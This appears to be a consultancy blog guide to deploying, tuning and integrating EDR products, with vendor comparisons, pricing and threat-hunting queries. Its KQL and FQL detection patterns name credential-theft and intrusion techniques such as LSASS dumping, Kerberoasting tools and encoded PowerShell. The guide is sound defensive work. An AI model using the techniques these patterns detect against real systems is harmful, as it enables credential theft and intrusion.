EDR in the company: Deployment, Tuning and Incident Response
Endpoint Detection and Response (EDR) is the critical security layer for modern endpoints. This guide explains EDR architecture and deployment (CrowdStrike Falcon, Microsoft Defender for Endpoint, SentinelOne, Carbon Black), how to properly configure EDR alerting (avoiding alert fatigue), how to use EDR data for threat hunting, and how to integrate EDR with SOAR and SIEM. Includes a comparison of EDR vs. XDR vs. MDR.
Table of Contents (6 sections)
EDR has replaced traditional antivirus software—and is now the most important technical security measure at the endpoint level. But a misconfigured EDR is almost as bad as having none at all: too many alerts lead to alert fatigue, causing security teams to ignore even genuine threats. This guide explains not only what EDR is, but how to properly deploy, tune, and integrate it into security operations.
EDR Architecture
EDR System Architecture:
EDR Agent (Endpoint):
→ Runs on every endpoint (Windows/macOS/Linux)
→ Kernel-level integration: syscalls, API hooks, process monitoring
→ Telemetry collection:
- Process trees: Who started whom?
- Network connections: outbound/inbound connections
- File operations: Created, Read, Deleted, Modified
- Registry changes (Windows): Persistence mechanisms
- Memory: Injection detection, hollowing, reflective loading
- User logins: Which user on which system?
EDR Backend:
→ Cloud SaaS (CrowdStrike, SentinelOne) or On-Premise (Carbon Black)
→ Telemetry Collection: terabytes/day from all endpoints
→ Detection Engine: Behavioral Analytics + ML
→ Threat Intelligence Integration: known IOCs, TTPs
→ SIEM/SOAR integration via API
Detection mechanisms:
Signature-based:
→ Hash-based: known malware files
→ Fast, no false positives, but only known malware
→ Foundation for all EDRs
Behavior-based:
→ Process tree analysis: Office → PowerShell → cmd → certutil
→ Is this sequence normal for legitimate software?
→ Detects: fileless malware, Living-off-the-Land (LotL)
Machine Learning:
→ Anomaly detection: this system is behaving unusually
→ Unsupervised: no training with labels required
→ Online learning: learns new variants in real time
Memory Analysis:
→ Detect process injection (DLL injection, process hollowing)
→ Reflective DLL loading: DLL loads itself from memory
→ Shellcode detection in legitimate process memoryMarket Leaders Compared
CrowdStrike Falcon:
Deployment: SaaS (no local infrastructure)
Agent: Lightweight (~10 MB RAM) – important for performance
Strengths: Market leader in the enterprise segment, best threat intelligence
Special feature: Threat Graph – universal graph of all activities
Falcon Modules:
Falcon Prevent: Protection (AV replacement)
Falcon Insight: EDR (Detection + Response)
Falcon Discover: Asset Discovery + Hygiene
Falcon Identity: AD integration, identity threat detection
Falcon Intelligence: Premium threat intelligence
Falcon Forensics: Endpoint forensics
Falcon Query Language (FQL):
# All connections to known C2 IPs in the last 24 hours:
event_simpleName=NetworkConnectIP4
| filter (RemoteIP="185.220.101.0/24" OR RemoteIP="23.27.163.0/24")
| since(24h)
| table(ComputerName, RemoteIP, RemotePort, ImageFileName)
# Suspicious PowerShell commands:
event_simpleName=ProcessRollup2
| filter FileName="powershell.exe"
AND CommandLine=~"*-EncodedCommand*|*-enc *|*IEX*|*Invoke-Expression*"
| table(ComputerName, UserName, CommandLine, timestamp)
---
Microsoft Defender for Endpoint (MDE):
Deployment: Native M365 integration (no additional product required for Windows customers!)
Agent: Integrated into Windows 10/11 (Windows Defender Service)
Strengths: Deepest Windows integration, cost-effective for M365 customers, ASR rules
Defender Attack Surface Reduction (ASR):
# Block via PowerShell (or Intune):
Set-MpPreference -AttackSurfaceReductionRules_Ids <guid> `
-AttackSurfaceReductionRules_Actions Enabled
# Important ASR rules:
75668c1f-73b5-4cf0-bb93-3ecf5cb7cc84 # Block process creation from PSExec
d4f940ab-401b-4efc-aadc-ad5f3c50688a # Block Office from creating child processes
9e6c4e1f-7d60-472f-ba1a-a39ef669e4b3 # Block credential stealing from LSASS
be9ba2d9-53ea-4cdc-84e5-9b1eeee46550 # Block executable content from email
KQL queries in Microsoft Sentinel (Defender integration):
# Suspicious process hierarchy:
DeviceProcessEvents
| where InitiatingProcessFileName == "winword.exe"
and FileName in ("cmd.exe", "powershell.exe", "wscript.exe")
| project DeviceName, AccountName, InitiatingProcessCommandLine, ProcessCommandLine
| order by Timestamp desc
# LSASS Memory Access:
DeviceProcessEvents
| where ProcessCommandLine contains "lsass"
or (FileName == "procdump.exe" and ProcessCommandLine contains "lsass")
| project DeviceName, AccountName, ProcessCommandLine, Timestamp
---
SentinelOne:
Deployment: SaaS + On-Premise Option
Strengths: Autonomous Response (without SOC intervention), Storyline (Attack Context)
Special Feature: ActiveEDR - AI-powered Autonomous Threat Response
Storyline Technology:
→ All events are correlated into "stories" (attack narrative)
→ Not individual alerts—but: "This is the story of the attack"
→ Visualization: Process tree + network + files in a graph
Autonomous Response:
→ Kill: Terminate suspicious process
→ Quarantine: Move file to quarantine
→ Rollback: Reverse ransomware damage (Windows VSS!)
→ Network Isolate: Disconnect endpoint from network
SentinelOne Deep Visibility (Threat Hunting):
# STAR (SentinelOne Threat Intelligence Rules):
SELECT * FROM processes
WHERE process_name = "powershell.exe"
AND cmd_line CONTAINS "-EncodedCommand"
AND parent_process_name NOT IN ("svchost.exe", "msiexec.exe")
---
Carbon Black (VMware):
Deployment: On-premises (Carbon Black Enterprise EDR) or SaaS
Strengths: Deep recording, on-premises for regulated industries
Notable feature: Complete process recording – attack timelines lasting several minutes
Carbon Black evaluation:
On-premises advantage: Data remains internal (healthcare, KRITIS)
Disadvantage: Infrastructure overhead, less cloud-native than competitorsAlert Tuning and Avoiding Alert Fatigue
Alert fatigue is the biggest EDR problem:
→ Too many false positives → SOC ignores alerts
→ Real attacks go unnoticed!
→ Goal: < 50 alerts/day per SOC analyst (guideline)
Tuning Process:
Phase 1 - Monitoring Mode (Weeks 1-2):
→ Start EDR in "Observe/Monitor" mode (no blocking)
→ Measure baseline alert volume
→ Goal: 0 blocks in the first week (user acceptance!)
Phase 2 - Alert Classification:
→ Each alert: TP (True Positive) / FP (False Positive) / Benign?
→ Identify top 10 alert types
→ Most common sources of false positives:
- IT tools: PSExec, Ansible, SCCM, remote management
- Developer tools: Compilers, debuggers, Git hooks
- Monitoring agents: Splunk Forwarder, Puppet
- Backup software: Veeam, Commvault
Phase 3 - Exclusion Rules:
# CrowdStrike Exclusion (API/Console):
Indicator Exclusion:
Process: "C:\Program Files\Ansible\python.exe"
Type: Process Exclusion
Reason: Legitimate Ansible management tool
Scope: All servers (Server OU)
# MDE Exclusion via PowerShell:
Add-MpPreference -ExclusionProcess "C:\Program Files\Veeam\*"
Add-MpPreference -ExclusionPath "C:\ProgramData\Backup\temp"
⚠️ Exclusion Principles:
→ As specific as possible (path + process, not just path)
→ Never: exclude entire drives or system directories
→ Documentation: why was the exception added? Reviewer?
→ Quarterly Review: remove outdated exclusions!
Phase 4 - Alert Thresholds:
HIGH Priority (always respond immediately):
→ LSASS Memory Access / Credential Dump
→ Lateral Movement (PsExec/WMI from unknown source)
→ Ransomware behavior (Mass Encryption)
→ C2 callback to known IOC IP
→ Privilege Escalation: Token Impersonation
MEDIUM Priority (within 4 hours):
→ PowerShell Encoded Command
→ Suspicious Scheduled Task
→ User adds themselves to local admin group
→ Suspicious Office Macro
LOW Priority (daily in batch):
→ Internal port scanning (pentest or IT tool?)
→ Known PUAs (Potentially Unwanted Apps)
→ Outdated signatures on legacy systemsEDR for Threat Hunting
Threat Hunting with EDR Telemetry:
Proactive Hunting - Hypothesis-Driven:
Hypothesis 1: Kerberoasting attempt
# MDE KQL:
DeviceProcessEvents
| where ProcessCommandLine contains_any ("kerberoast", "GetUserSPNs", "asreproast")
or (FileName in ("Rubeus.exe", "PowerView.ps1"))
| project DeviceName, AccountName, ProcessCommandLine, Timestamp
Hypothesis 2: LSASS credential dump
DeviceProcessEvents
| where ProcessCommandLine contains "lsass"
or (FileName == "procdump.exe")
or (InitiatingProcessFileName == "powershell.exe"
and ProcessCommandLine contains "sekurlsa")
| project DeviceName, AccountName, FileName, ProcessCommandLine, Timestamp
Hypothesis 3: Persistence via Run Keys
DeviceRegistryEvents
| where RegistryKey has @"Run\"
and not RegistryKey startswith @"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
and RegistryValueName !in (known_autoruns) // custom allowlist!
| project DeviceName, AccountName, RegistryKey, RegistryValueData, Timestamp
Hypothesis 4: Lateral Movement via SMB
DeviceNetworkEvents
| where RemotePort == 445
and InitiatingProcessFileName !in ("System", "svchost.exe")
| summarize count() by DeviceName, RemoteIP, InitiatingProcessFileName
| where count_ > 5 // multiple SMB connections from an unusual process
Hypothesis 5: Unusual Parent-Child Process (LotL)
DeviceProcessEvents
| where InitiatingProcessFileName in ("winword.exe", "excel.exe", "powerpnt.exe")
and FileName in ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe")
| project DeviceName, AccountName, InitiatingProcessFileName, ProcessCommandLine, Timestamp
MITRE ATT&CK Mapping in Hunting:
T1003 (OS Credential Dumping) → Hypothesis 2
T1053 (Scheduled Task/Job) → Scheduled Task Hunt
T1021 (Remote Services) → Hypothesis 4
T1059 (Command and Scripting) → Hypothesis 5
T1547 (Boot/Logon Autostart) → Hypothesis 3EDR Integration in Security Operations
SIEM Integration:
CrowdStrike → Splunk:
# Splunk Add-on for CrowdStrike:
index=crowdstrike sourcetype=crowdstrike:events:json
| eval severity=case(
Severity>=80, "CRITICAL",
Severity>=60, "HIGH",
Severity>=40, "MEDIUM",
true(), "LOW")
| stats count by ComputerName, DetectDescription, severity
MDE → Microsoft Sentinel:
# Data Connector: "Microsoft 365 Defender"
# Automatic forwarding of all MDE tables to Sentinel:
DeviceEvents, DeviceProcessEvents, DeviceNetworkEvents,
DeviceFileEvents, DeviceRegistryEvents, DeviceAlertEvents
# Sentinel Workbook: "Endpoint Threat Protection"
# → Out-of-the-box dashboard for MDE data
SOAR Integration:
Incident → SOAR Playbook:
1. Alert received from EDR
2. SOAR checks: Is the endpoint critical? (CMDB lookup)
3. Enrichment: IP reputation, user context (AD)
4. Auto-response (depending on severity):
LOW: Create ticket + notify analyst
MEDIUM: Isolate endpoint (EDR API) + ticket
HIGH: Isolate + deactivate user (AD API) + escalation!
# Defender API: Isolate endpoint:
POST https://api.securitycenter.microsoft.com/api/machines/{machineId}/isolate
{
"Comment": "Incident #1234 - Credential dumping detected",
"IsolationType": "Full"
}
# SentinelOne API: Network Disconnect:
POST /web/api/v2.1/agents/actions/disconnect
{
"filter": {"ids": ["agent_id_here"]},
"data": {}
}
EDR vs. XDR vs. MDR:
EDR: Endpoint-only telemetry, self-managed
→ Good for: Companies with their own SOC
XDR: Endpoint + Network + Email + Cloud (correlated)
→ CrowdStrike Falcon XDR, MDE + Sentinel, SentinelOne XDR
→ Better: broader visibility, fewer alert silos
MDR (Managed Detection and Response):
→ External SOC provider operates EDR/XDR
→ 24/7 monitoring without an in-house SOC team
→ Providers: CrowdStrike Falcon Complete, SentinelOne Vigilance, AWARE7 SOC
→ Recommended for SMBs without an in-house security team!Sizing and Costs
EDR Cost Overview (Enterprise Pricing):
CrowdStrike Falcon:
Falcon Go: ~$5/endpoint/month (SMB)
Falcon Pro: ~$8–10/endpoint/month
Falcon Enterprise: ~$15–20/endpoint/month (incl. Threat Intel)
Falcon Complete: ~$25+/endpoint/month (MDR included)
Microsoft Defender for Endpoint:
Plan 1: €2.10/user/month (included in M365 Business Premium!)
Plan 2: €4.20/user/month (included in M365 E5!)
→ Often little to no additional cost for M365 customers!
SentinelOne:
Singularity Core: ~$5/endpoint/month
Singularity Control: ~$8/endpoint/month
Singularity Complete: ~$12–15/endpoint/month (with Storyline+)
Sizing guidelines:
100 endpoints: CrowdStrike Pro ~€1,000/month
500 endpoints: CrowdStrike Pro ~€4,500/month
1,000 endpoints: Enterprise tier, ~€8-12k/month
TCO calculation (no agent ≠ no effort):
Licenses: ~60% of total costs
Deployment: Initial ~40 hours for 500 endpoints
Tuning (ongoing): ~4–8 hours/month for alert tuning
SOC staff: largest cost factor! (1 analyst ~€70–80k/year)
→ MDR is often more cost-effective than an internal SOC for <2,000 endpoints
```</guid>Questions about this topic?
Our experts advise you free of charge and without obligation.
About the Author
Geschäftsführender Gesellschafter der AWARE7 GmbH mit langjähriger Expertise in Informationssicherheit, Penetrationstesting und IT-Risikomanagement. Absolvent des Masterstudiengangs Internet-Sicherheit an der Westfälischen Hochschule (if(is), Prof. Norbert Pohlmann). Bestseller-Autor im Wiley-VCH Verlag und Lehrbeauftragter der ASW-Akademie. Einschätzungen zu Cybersecurity und digitaler Souveränität erschienen u.a. in Welt am Sonntag, WDR, Deutschlandfunk und Handelsblatt.
10 Publikationen
- Einsatz von elektronischer Verschlüsselung - Hemmnisse für die Wirtschaft (2018)
- Kompass IT-Verschlüsselung - Orientierungshilfen für KMU (2018)
- IT Security Day 2025 - Live Hacking: KI in der Cybersicherheit (2025)
- Live Hacking - Credential Stuffing: Finanzrisiken jenseits Ransomware (2025)
- Keynote: Live Hacking Show - Ein Blick in die Welt der Cyberkriminalität (2025)
- Analyse von Angriffsflächen bei Shared-Hosting-Anbietern (2024)
- Gänsehaut garantiert: Die schaurigsten Funde aus dem Leben eines Pentesters (2022)
- IT Security Zertifizierungen — CISSP, T.I.S.P. & Co (Live-Webinar) (2023)
- Sicherheitsforum Online-Banking — Live Hacking (2021)
- Nipster im Netz und das Ende der Kreidezeit (2017)
IT-Grundschutz-Praktiker (TÜV) IT Risk Manager (DGI) § 8a BSIG Prüfverfahrenskompetenz Ausbilderprüfung (IHK)
